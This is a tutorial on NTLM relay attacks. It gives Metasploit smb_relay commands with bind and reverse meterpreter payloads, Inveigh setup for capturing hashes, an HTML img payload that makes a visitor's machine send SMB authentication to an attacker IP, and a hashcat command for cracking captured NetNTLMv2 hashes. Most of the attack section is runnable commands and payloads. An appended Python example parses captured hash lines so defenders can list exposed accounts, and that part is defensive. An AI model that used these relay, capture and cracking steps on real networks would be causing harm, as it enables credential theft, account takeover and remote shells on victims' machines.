Preface
NTLM relay attack
Relay
- A relay only succeeds when the victim and the target it is forwarded to share the same username and password.
msf listening port
Bind (forward) connection
set payload windows/meterpreter/bind_tcp: use a bind (active) connection
set smbhost <ip>: the IP address of the target the authentication is relayed to
set rhost <ip>: the target IP address
```
msfconsole
msf > use exploit/windows/smb/smb_relay
msf exploit(windows/smb/smb_relay) > set autorunscript post/windows/manage/migrate
msf exploit(windows/smb/smb_relay) > set payload windows/meterpreter/bind_tcp
msf exploit(windows/smb/smb_relay) > show options
msf exploit(windows/smb/smb_relay) > set smbhost <ip>
msf exploit(windows/smb/smb_relay) > set rhost <ip>
```
Reverse connection
set lhost <ip>: the IP address of the local (msf) machine
```
msfconsole
msf > use exploit/windows/smb/smb_relay
msf exploit(windows/smb/smb_relay) > set autorunscript post/windows/manage/migrate
msf exploit(windows/smb/smb_relay) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/smb_relay) > show options
msf exploit(windows/smb/smb_relay) > set smbhost <ip>
msf exploit(windows/smb/smb_relay) > set lhost <ip>
```
The victim sends an SMB request to msf
<ip>: the IP address of the msf server
Inveigh sniffing
Download the project
```bash
wget https://github.com/Kevin-Robertson/Inveigh/releases/download/v2.0.11/Inveigh-net8.0-linux-x64-trimmed-single-v2.0.11.tar.gz
mkdir Inveigh
tar -zxvf Inveigh-net8.0-linux-x64-trimmed-single-v2.0.11.tar.gz -C Inveigh
cd Inveigh
```
The attacker starts the Inveigh service
The victim sends an SMB request to the attacker
<ip>: the IP address of the Inveigh server
Build a web page so that opening it triggers an SMB request
<ip>: the IP address of the Inveigh server
```html
<img src="file:///\\<ip>\ipc$">
```
Brute-forcing the NTLM hash with hashcat
Download the dependencies
```bash
git clone https://github.com/hashcat/hashcat.git
cd hashcat
make && make install
```
Brute force
-m 5600: selects the hash mode for NTLM hashes
<hash>: the NTLM hash obtained in the previous step
<file>.txt: the dictionary file
```bash
hashcat -m 5600 <hash> <file>.txt --show
```
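Mode 5600 takes NetNTLMv2 challenge-response captures in the form USER::DOMAIN:SERVER_CHALLENGE:NTPROOFSTR:BLOB. As an added example that is not part of the original post, the Python below parses and validates such lines so that a defender reviewing a capture from a listener like Inveigh can list which accounts were exposed, and when (from the FILETIME inside the client blob), without cracking anything; the sample lines, account names and the make_blob helper are constructed for this example.

```python
# Triage NetNTLMv2 lines in hashcat's -m 5600 format: which accounts were exposed and
# when, without cracking. Added example, not from the original post; samples constructed.
from datetime import datetime, timedelta, timezone
from typing import NamedTuple
import re, struct

_HEX = re.compile(r"^[0-9a-fA-F]+$")
_EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)  # Windows FILETIME epoch

class NetNtlmV2(NamedTuple):
    user: str
    domain: str
    server_challenge: str  # 8 bytes, hex
    nt_proof: str          # 16-byte NTProofStr (HMAC-MD5), hex
    blob: str              # NTLMv2 client blob, hex
    def timestamp(self) -> datetime:
        # Blob layout: sig 0x0101 (2) + reserved (2) + reserved (4) + FILETIME (8) + ...
        ft, = struct.unpack("<Q", bytes.fromhex(self.blob[16:32]))
        return _EPOCH_1601 + timedelta(microseconds=ft // 10)

def parse_5600(line: str) -> NetNtlmV2:
    """Parse USER::DOMAIN:SERVER_CHALLENGE:NTPROOFSTR:BLOB; raise ValueError if malformed."""
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("expected USER::DOMAIN:CHALLENGE:PROOF:BLOB")
    user, _, domain, chal, proof, blob = parts
    if (len(chal) != 16 or len(proof) != 32 or len(blob) < 32 or len(blob) % 2
            or not all(_HEX.match(x) for x in (chal, proof, blob))):
        raise ValueError("challenge, NTProofStr or blob has wrong length or non-hex chars")
    return NetNtlmV2(user, domain, chal.lower(), proof.lower(), blob.lower())

def exposed_accounts(lines):
    # Returns (sorted unique 'DOMAIN\user' names, number of malformed lines skipped).
    seen, bad = set(), 0
    for line in filter(str.strip, lines):
        try:
            h = parse_5600(line)
            seen.add(f"{h.domain}\\{h.user}")
        except ValueError:
            bad += 1
    return sorted(seen), bad

def make_blob(when: datetime) -> str:  # constructed blob carrying a given FILETIME
    d = when - _EPOCH_1601
    ft = (d.days * 86400 + d.seconds) * 10_000_000 + d.microseconds * 10
    return (b"\x01\x01\x00\x00" + bytes(4) + struct.pack("<Q", ft) + bytes(12)).hex()

T0 = datetime(2024, 1, 2, 3, 4, 5, tzinfo=timezone.utc)
SAMPLE = [  # constructed capture: two accounts plus one malformed line
    "alice::CORP:1122334455667788:00112233445566778899aabbccddeeff:" + make_blob(T0),
    "bob::CORP:8877665544332211:ffeeddccbbaa99887766554433221100:" + make_blob(T0 + timedelta(seconds=55)),
    "garbage line",
]
```

Every account that appears in the output had its credential exposed to the listener and should be treated as compromised, whether or not the hash is ever cracked.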
Done